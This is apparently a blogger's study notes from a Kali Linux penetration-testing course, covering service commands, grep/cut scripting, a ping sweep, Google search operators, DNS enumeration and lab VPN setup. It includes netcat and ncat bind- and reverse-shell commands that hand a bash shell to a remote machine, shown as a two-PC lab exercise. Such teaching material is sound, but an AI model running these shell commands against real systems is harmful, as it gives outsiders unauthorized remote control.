I’m learning Penetration Testing with Kali Linux and taking notes as I follow the video. This is one way for me to review the old stuff I already knew years ago but stopped using because of different project assignments.
Use the comments below to post your questions or suggestions.
root#Kali:# passwd ; to change the root password. It’s a habit; I want to make sure I’m the only one using this super user account.
Starting SSH Service
root#Kali:# service ssh start
Verify the service is running
root#Kali:# netstat -antp |grep sshd ; the output should show the sshd process listening on port 22.
To stop the service.
root#Kali:# service ssh stop
Starting HTTP Service
root#Kali:# service apache2 start
To test if the HTTP server is up and running, open a web browser and enter the URL, e.g. http://127.0.0.1
root#Kali:# service apache2 stop
The example above updates the index.html file with the text “Kali Linux rocks”. Refresh your web browser to see the change. Then stop the apache service to close your session.
As an alternative, you can use the init scripts located in /etc/init.d/ to start and stop a service.
For example, the ssh init script is used as /etc/init.d/ssh start and /etc/init.d/ssh stop.
Use the cat command piped to grep to find a certain text in a file. For example, look for “href=” in an index.html file: cat index.html | grep "href="
The output shows every line of index.html that contains “href=”.
Let us filter this result by using the following command.
cat index.html | grep "href=" | cut -d"/" -f3 | grep "cisco.com" | more [enter]. The result is much better, simply by piping the cat output through a few more filters.
We can still make it better. Don’t you think?
The “f3” means field 3, “f1” is field 1.
Here’s an alternative command using the character class “[A-Za-z0-9_,-]”, as shown below.
The second command, ending with >cisco.txt, redirects the result to a file.
When I tried this using my home computer, the host www.cisco.com showed 220.127.116.11 because they are using the Akamai service. You might get a different resolved IP address; that should be OK. Our goal is to test the command line.
f1 is the FQDN e.g. e144.dscb.akamaiedge.net as shown above.
f2 is the string “has”
f3 is the string “address”
f4 is the IP Address e.g. 18.104.22.168
cut on the space delimiter (cut -d" ") to show field 4 (f4)
#host www.cisco.com | grep "has address" | cut -d" " -f4
Now let’s create a bash script.
#nano cisco.sh ; use the nano text editor to create the cisco.sh script.
The script is a for loop reading the hostnames in cisco.txt, running host on each one, grepping for “has address”, and cutting field 4 on the space delimiter.
We changed the cisco.sh permissions to 755 (executable) and ran ./cisco.sh, which shows the resolved addresses.
You can also produce a similar result by typing directly to the command prompt using bash scripting as shown below.
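The href pipeline and the cisco.sh loop together, as an added example that is not the post’s own script: the input is a constructed index.html fragment and a constructed copy of what host prints, so it runs offline; swap fake_host for the real host command to use live DNS.

```shell
#!/bin/bash
# Added example, not the post's own cisco.sh: the same grep/cut pipeline and
# loop, run over constructed input so it works offline with no DNS lookups.

# Constructed stand-in for the saved index.html (only the href= lines matter).
SAMPLE_HTML='<a href="http://www.cisco.com/c/en/us/products.html">Products</a>
<a href="https://tools.cisco.com/security/center/home.x">Security</a>
<a href="http://www.example.net/page.html">Other site</a>
<img src="/img/logo.png">'

# Constructed stand-in for what `host <fqdn>` prints; real answers will differ.
SAMPLE_HOST_OUTPUT='www.cisco.com is an alias for www.cisco.com.akadns.net.
www.cisco.com.akadns.net has address 203.0.113.10
www.cisco.com.akadns.net has IPv6 address 2001:db8::10
tools.cisco.com has address 203.0.113.20'

# Replace the body with the real `host "$1"` to query live DNS instead.
fake_host() {
    printf '%s\n' "$SAMPLE_HOST_OUTPUT" | grep -F "$1"
}

# Step 1 (the command-line pipeline): keep href= lines, split on "/" and take
# field 3 (the hostname), keep only cisco.com names, drop duplicates.
extract_cisco_hosts() {
    printf '%s\n' "$SAMPLE_HTML" | grep "href=" | cut -d"/" -f3 \
        | grep "cisco.com" | sort -u
}

# Step 2 (the cisco.sh loop): resolve each hostname and keep the IPv4 answers.
# grep "has address" also drops the "has IPv6 address" lines, and
# cut -d" " -f4 returns field 4, the address itself.
resolve_hosts() {
    for fqdn in "$@"; do
        fake_host "$fqdn" | grep "has address" | cut -d" " -f4
    done
}

# Both steps together: the same as "... > cisco.txt" followed by ./cisco.sh
cisco_sh() {
    resolve_hosts $(extract_cisco_hosts)
}

cisco_sh
```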
Here is an example of the ping-loop.sh script. Without a packet count, ping keeps running until it is interrupted, so the -c 1 counter makes it send a single packet per host and lets the loop move on to the next address.
for ip in $(seq 200 210); do
    ping -c 1 192.168.2.$ip
done
Save this as the ping-loop.sh script file. Change the permission to executable by using the following command.
#chmod 755 ping-loop.sh
Then run it.
#./ping-loop.sh ; this will produce the results, one ping reply (or timeout) for each of 192.168.2.200 through 192.168.2.210.
Now let’s review how to use a Bind Shell and a Reverse Shell. You need two workstations for this exercise: the 1st PC (CorporatePC with IP 192.168.10.100) is in your network and the 2nd PC (OutsiderPC with IP 192.168.10.200) is on the outside network.
Using a Bind Shell, start this command on your OutsiderPC.
nc -nvlp 5555 -e /bin/bash ; this starts netcat listening on port 5555 (of course you can use another port number) and allows the client (CorporatePC) to connect and get a bash shell prompt.
From the CorporatePC, connect using the following command.
nc -nv 192.168.10.200 5555 [Enter] ; the IP address is the one assigned to the OutsiderPC.
When you type “ifconfig” you will see the IP address of the OutsiderPC, because the command is executed on the OutsiderPC.
Now the Reverse Shell. The difference is that the client (CorporatePC) provides the shell with -e /bin/bash, while the OutsiderPC only listens. Let’s begin by preparing our OutsiderPC. On the OutsiderPC, type the following command.
nc -nvlp 5555
From the InsiderPC (the CorporatePC), connect using the following command.
nc -nv 192.168.10.200 5555 -e /bin/bash [Enter] ; the IP address is the one assigned to the OutsiderPC.
On the OutsiderPC, type “ifconfig” and you will see the InsiderPC IP address, because the command is executed on the InsiderPC.
Please note, netcat traffic is not encrypted. All transactions are in plain text. The ncat tool provides the encryption that the netcat command lacks. The process is the same whether you use a bind shell or a reverse shell.
Bind Shell. From the OutsiderPC, type the following command.
ncat -lvp 443 -e /bin/bash --allow 192.168.x.x --ssl ; ncat listens on port 443 and executes a bash shell over SSL (encrypted session). Only the specified IP address, e.g. 192.168.x.x, is allowed to connect.
From the CorporatePC, type the following command.
ncat -nv 192.168.10.200 443 --ssl ; now you’re remotely connected to the OutsiderPC over an encrypted session.
And for the reverse shell, same concept.
From OutsiderPC, enter the following command.
ncat -lvp 443 --ssl
From the CorporatePC, connect using the following command.
ncat -v 192.168.10.200 443 -e /bin/bash --ssl ; now the OutsiderPC is remotely connected to the InsiderPC over an encrypted session.
You can use Wireshark to confirm that the session between the two workstations is encrypted. Try this in your test environment to see how it works.
Another example. From the OutsiderPC, run the command.
#ncat -lvp 4444 -e /bin/bash --allow 192.168.2.100 --ssl
This runs ncat (encrypted) listening (-lvp) on port 4444, executes the bash shell, and only allows the 192.168.2.100 workstation to connect over SSL.
From the InsiderPC: #ncat -v 192.168.2.200 4444 --ssl
You will see the ncat SHA-1 certificate fingerprint, the certificate verification and the SSL connection to the target workstation.
Passive Gathering, or passive information gathering, is finding all the information you can about your target without touching it directly. Google Search is an excellent tool. Here is an example; type this in the Google search page.
site:”Microsoft.com” filetype:ppt “penetration testing” ; we are restricting the search to the Microsoft.com domain, using the filetype operator to look for PowerPoint files with the PPT extension, and searching for the specific phrase “penetration testing”. Run this in your browser and review the results.
Another example, using the intitle operator. Enter this in the Google search page: intitle:”VNC viewer for Java”
And if you’re interested to learn other google search operators, visit this website http://www.googleguide.com/advanced_operators_reference.html.
Also use the Google Hacking Database (GHDB), now hosted by The Exploit Database at the exploit-db.com site.
How about Active Gathering? Now you use your penetration testing tools, such as port scanning, DNS scanning, enumeration, vulnerability scanning, etc. Please note, test only in your own working environment.
Let’s test DNS enumeration against hardworking.com. Type the following commands, changing the domain name to your own website so you will see the results you expect.
host -t ns hardworking.com [Enter] ; the -t option selects the query type. In our example, the query type is ns, which lists the name servers for the hardworking.com domain name. You should see two name servers, nash.ns.cloudflare.com and arya.ns.cloudflare.com.
host -t mx hardworking.com [Enter] ; if you guessed mail exchange information, you are correct. We are using Google for Work email hosting.
If you don’t have access to a Linux box to run these commands, you can use free online tools such as NetworkQuery.com, DNSStuff.com, etc.
To extend DNS enumeration, you can use the forward and reverse DNS to get more information.
A Connect Scan (TCP connect) relies on the full three-way handshake, so the connection is completed and logged on the target.
SYN Scanning (half-open or Stealth Scan) sends a SYN packet and reads the SYN/ACK or RST reply without completing the TCP handshake.
A UDP Scan is stateless and does not involve a three-way handshake.
NMAP is the Swiss army knife for every admin or network administrator out there. If you don’t have it, go download this tool and add it to your arsenal of networking tools.
Before I go on, let me setup my lab workstation and connection.
Visit VMware.com website to download the Workstation Player, here’s the link https://www.vmware.com/products/player/. Download the right program for your lab workstation. I’m using Windows 10, so I will download the 64-bit version. Install it by default, then open the Kali Linux PWK VM image provided to you.
Once your Kali Linux PWK VM image is up and running, don’t forget to change your root password to something new. Keep in mind, you will be connected to a lab environment where other ethical hackers will be curious to find out about (hack) your test workstation.
Setting up OpenVPN. Download the lab connection configuration, the link should be provided to your email. Initiate the download from a running Kali Linux PWK VM image, you should be able to see it at /root/Download/.
Extract by running this command “tar jxpf lab-connection.tar.bz2” [Enter]
Start the OpenVPN session. root@kali:~/Downloads/lab-connection/ openvpn lab-connection.conf [Enter]. This will prompt you to enter your username and password. If connected properly, you should see Initialization Sequence Completed.
If you can’t connect from your work network, maybe a firewall is blocking your OpenVPN connection. Make sure TCP 443, TCP 943 and UDP 1194 are open. I’ve tested it. Once connected, leave that terminal running. Open another terminal console to check the new IP address assigned to you over the OpenVPN connection. Type the command ifconfig tap0 (plain ifconfig will also work). To test your OpenVPN connection, ping one of the lab server IPs.
Dedicated Windows 7 Virtual Machine. Go to your Student Control Panel to power on your Windows 7. After that, in terminal console run rdesktop -u xxxx -p yyyy 192.168.xx.xx to connect to your Windows 7 Virtual Machine.
Enjoy your lab.
We moved to KING.NET, so future updates of this article will be posted there.
This article was first posted at https://que.com website. February 13, 2016.